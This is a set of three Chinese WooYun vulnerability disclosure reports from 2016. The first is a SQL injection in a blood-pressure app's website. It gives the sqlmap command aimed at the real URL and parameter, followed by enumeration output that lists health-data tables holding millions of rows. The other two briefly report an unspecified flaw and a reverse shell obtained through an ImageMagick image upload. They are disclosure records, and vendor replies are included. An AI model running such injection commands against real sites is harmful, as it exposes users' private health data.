漏洞详情披露状态： 2016-05-08： 细节已通知厂商并且等待厂商处理中2016-05-09： 厂商已经确认，细节仅向厂商公开2016-05-19： 细节向核心白帽子及相关领域专家公开2016-05-29： 细节向普通白帽子公开2016-06-08： 细节向实习白帽子公开2016-06-23： 细节向公众公开简要描述：RT 厂商大哥 app加waf pc没加哦详细说明： code 区域注入点： sqlmap.py -u "http://www.xueyazhushou.com/info/infocontent.php?info_id =1" -D tijianshi --count --tables数据库信息code 区域available databases [5]: [*] amh [*] information_schema [*] mysql [*] performance_schema [*] tijianshi当前库表信息code 区域Database: tijianshi +---------------------------+---------+ | Table | Entries | +---------------------------+---------+ | loveand_emo | 5008927 | | loveand_bloodPressure | 4741975 | | loveand_heartRate | 4306167 | | loveand_oxygen | 3947519 | | loveand_kkk | 3768803 | | loveand_wave | 2539251 | | loveand_emoCoin | 1377344 | | loveand_coin | 1332896 | | loveand_lungsBreath | 725240 | | loveand_users | 724432 | | loveand_stepCounter | 627474 | | loveand_device | 560664 | | loveand_bloodPressureCoin | 552874 | | loveand_heartRateCoin | 534761 | | loveand_oxygenCoin | 495911 | | loveand_kkkCoin | 474414 | | loveand_waveCoin | 474335 | | loveand_breathRate | 464993 | | loveand_push | 460668 | | loveand_visionValue | 390168 | | loveand_listen | 308340 | | loveand_visionSemang | 278497 | | loveand_weight | 254260 | | loveand_stature | 253355 | | loveand_user_fix_hand | 151242 | | loveand_xinliYiyu | 148954 | | loveand_visonSeruo | 146770 | | loveand_bmi | 131925 | | loveand_visionSemangCoin | 107117 | | loveand_lungsBreathCoin | 77208 | | loveand_visionTrain4 | 63898 | | loveand_msg | 63851 | | loveand_visionTrain2 | 56345 | | loveand_visionTrain7 | 56038 | | loveand_bloodPressTrain2 | 51639 | | loveand_visionTrain3 | 50462 | | loveand_visionTrain5 | 49252 | | loveand_xinliKangya | 48788 | | loveand_visionTrain1 | 47949 | | loveand_visionValueCoin | 46934 | | loveand_xinliZibi | 45150 | | loveand_coinGain | 42592 | | loveand_visionCoin4 | 42334 | | loveand_visionTrain9 | 39516 | | loveand_visionTrain6 | 36845 | | loveand_visionCoin5 | 32972 | | loveand_listenCoin | 32397 | | loveand_visionCoin7 | 32212 | | loveand_visionTrain8 | 32121 | | loveand_visionCoin1 | 31517 | | loveand_temperature | 31273 | | loveand_visionCoin2 | 31125 | | loveand_visonSeruoCoin | 31020 | | loveand_comment | 29835 | | loveand_visionCoin3 | 27625 | | loveand_weightTrain1 | 23881 | | loveand_news | 23798 | | loveand_xinliYiyuCoin | 21680 | | loveand_visionCoin6 | 21120 | | loveand_visionCoin9 | 20779 | | loveand_visionCoin8 | 20163 | | loveand_user_bind | 19574 | | loveand_bloodPressTrain1 | 19063 | | loveand_info_comment | 17747 | | loveand_weightCoin1 | 17726 | | loveand_user_notice | 15112 | | loveand_listenTrain1 | 12164 | | loveand_xinliKangyaCoin | 10889 | | loveand_bloodPressCoin1 | 8643 | | loveand_coin_store | 8331 | | loveand_listenTrain2 | 7817 | | loveand_xinliZibiCoin | 7731 | | loveand_listenCoin1 | 7161 | | loveand_listenTrain4 | 6349 | | loveand_listenTrain3 | 6190 | | loveand_listenTrain5 | 5942 | | loveand_listenCoin2 | 5353 | | loveand_listenCoin4 | 4501 | | loveand_listenCoin3 | 4493 | | loveand_listenCoin5 | 4311 | | loveand_feedback | 3133 | | loveand_user_fix | 2885 | | loveand_user_msg | 2832 | | loveand_weightTrain2 | 1393 | | loveand_user_friends | 1365 | | loveand_info | 1299 | | loveand_weightCoin2 | 1184 | | loveand_blacklist | 193 | | loveand_user_fix_cal | 157 | | loveand_user_family | 51 | | loveand_infotitle | 15 | | loveand_newstitle | 7 | | loveand_banner | 4 | | loveand_admin | 2 | | loveand_push_sys | 1 | | loveand_weixin | 1 | +---------------------------+---------+垮裤查询code 区域Database: amh +------------+---------+ | Table | Entries | +------------+---------+ | amh_config | 9 | | amh_login | 9 | | amh_log | 8 | | amh_ftp | 1 | | amh_host | 1 | | amh_user | 1 | +------------+---------+dba权限 漏洞证明： code 区域注入点： sqlmap.py -u "http://www.xueyazhushou.com/info/infocontent.php?info_id =1" -D tijianshi --count --tables数据库信息code 区域available databases [5]: [*] amh [*] information_schema [*] mysql [*] performance_schema [*] tijianshi当前库表信息code 区域Database: tijianshi +---------------------------+---------+ | Table | Entries | +---------------------------+---------+ | loveand_emo | 5008927 | | loveand_bloodPressure | 4741975 | | loveand_heartRate | 4306167 | | loveand_oxygen | 3947519 | | loveand_kkk | 3768803 | | loveand_wave | 2539251 | | loveand_emoCoin | 1377344 | | loveand_coin | 1332896 | | loveand_lungsBreath | 725240 | | loveand_users | 724432 | | loveand_stepCounter | 627474 | | loveand_device | 560664 | | loveand_bloodPressureCoin | 552874 | | loveand_heartRateCoin | 534761 | | loveand_oxygenCoin | 495911 | | loveand_kkkCoin | 474414 | | loveand_waveCoin | 474335 | | loveand_breathRate | 464993 | | loveand_push | 460668 | | loveand_visionValue | 390168 | | loveand_listen | 308340 | | loveand_visionSemang | 278497 | | loveand_weight | 254260 | | loveand_stature | 253355 | | loveand_user_fix_hand | 151242 | | loveand_xinliYiyu | 148954 | | loveand_visonSeruo | 146770 | | loveand_bmi | 131925 | | loveand_visionSemangCoin | 107117 | | loveand_lungsBreathCoin | 77208 | | loveand_visionTrain4 | 63898 | | loveand_msg | 63851 | | loveand_visionTrain2 | 56345 | | loveand_visionTrain7 | 56038 | | loveand_bloodPressTrain2 | 51639 | | loveand_visionTrain3 | 50462 | | loveand_visionTrain5 | 49252 | | loveand_xinliKangya | 48788 | | loveand_visionTrain1 | 47949 | | loveand_visionValueCoin | 46934 | | loveand_xinliZibi | 45150 | | loveand_coinGain | 42592 | | loveand_visionCoin4 | 42334 | | loveand_visionTrain9 | 39516 | | loveand_visionTrain6 | 36845 | | loveand_visionCoin5 | 32972 | | loveand_listenCoin | 32397 | | loveand_visionCoin7 | 32212 | | loveand_visionTrain8 | 32121 | | loveand_visionCoin1 | 31517 | | loveand_temperature | 31273 | | loveand_visionCoin2 | 31125 | | loveand_visonSeruoCoin | 31020 | | loveand_comment | 29835 | | loveand_visionCoin3 | 27625 | | loveand_weightTrain1 | 23881 | | loveand_news | 23798 | | loveand_xinliYiyuCoin | 21680 | | loveand_visionCoin6 | 21120 | | loveand_visionCoin9 | 20779 | | loveand_visionCoin8 | 20163 | | loveand_user_bind | 19574 | | loveand_bloodPressTrain1 | 19063 | | loveand_info_comment | 17747 | | loveand_weightCoin1 | 17726 | | loveand_user_notice | 15112 | | loveand_listenTrain1 | 12164 | | loveand_xinliKangyaCoin | 10889 | | loveand_bloodPressCoin1 | 8643 | | loveand_coin_store | 8331 | | loveand_listenTrain2 | 7817 | | loveand_xinliZibiCoin | 7731 | | loveand_listenCoin1 | 7161 | | loveand_listenTrain4 | 6349 | | loveand_listenTrain3 | 6190 | | loveand_listenTrain5 | 5942 | | loveand_listenCoin2 | 5353 | | loveand_listenCoin4 | 4501 | | loveand_listenCoin3 | 4493 | | loveand_listenCoin5 | 4311 | | loveand_feedback | 3133 | | loveand_user_fix | 2885 | | loveand_user_msg | 2832 | | loveand_weightTrain2 | 1393 | | loveand_user_friends | 1365 | | loveand_info | 1299 | | loveand_weightCoin2 | 1184 | | loveand_blacklist | 193 | | loveand_user_fix_cal | 157 | | loveand_user_family | 51 | | loveand_infotitle | 15 | | loveand_newstitle | 7 | | loveand_banner | 4 | | loveand_admin | 2 | | loveand_push_sys | 1 | | loveand_weixin | 1 | +---------------------------+---------+垮裤查询code 区域Database: amh +------------+---------+ | Table | Entries | +------------+---------+ | amh_config | 9 | | amh_login | 9 | | amh_log | 8 | | amh_ftp | 1 | | amh_host | 1 | | amh_user | 1 | +------------+---------+dba权限 修复方案：过滤版权声明：转载请注明来源 黑色键盘丶@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-09 10:19厂商回复：自学php3个月，被打脸系列2最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述： 详细说明：说什么好呢……进入 漏洞证明：如上……修复方案：意识问题……版权声明：转载请注明来源 岛云首席鉴黄师@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：7确认时间：2016-04-29 10:18厂商回复：CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给重庆分中心，由重庆分中心后续协调网站管理单位处置。最新状态：暂无

漏洞详情披露状态： 2016-05-06： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：聚美主站命令执行详细说明：ImageMagick 漏洞1.编辑口碑，上传精心制造的图片如下图2.shell已经反弹回来就这样，点到为止漏洞证明：ImageMagick 漏洞1.编辑口碑，上传精心制造的图片如下图2.shell已经反弹回来就这样，点到为止修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-06 10:02厂商回复：手快啊,我们是今天凌晨修复的.最新状态：暂无